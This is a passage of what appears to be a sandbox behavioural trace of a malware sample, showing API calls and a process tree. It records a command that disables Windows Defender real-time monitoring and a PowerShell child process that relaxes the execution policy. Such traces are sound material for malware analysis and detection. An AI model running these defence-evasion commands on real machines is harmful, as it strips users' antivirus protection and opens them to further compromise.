(lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0182.509] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0182.511] CloseHandle (hObject=0xa8) returned 1 [0182.562] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x56ecd8 [0182.562] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x56ed50 [0182.562] SetLastError (dwErrCode=0x0) [0182.563] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0182.563] CreateProcessW (lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488) Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x3c1af000" os_pid = "0x3f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xb04" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0x69c Process: id = "12" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x3bceb000" os_pid = "0x790" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x370" cmd_line = "taskeng.exe {3D030D12-FDAA-4FAC-861F-6FB410540A37} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0x760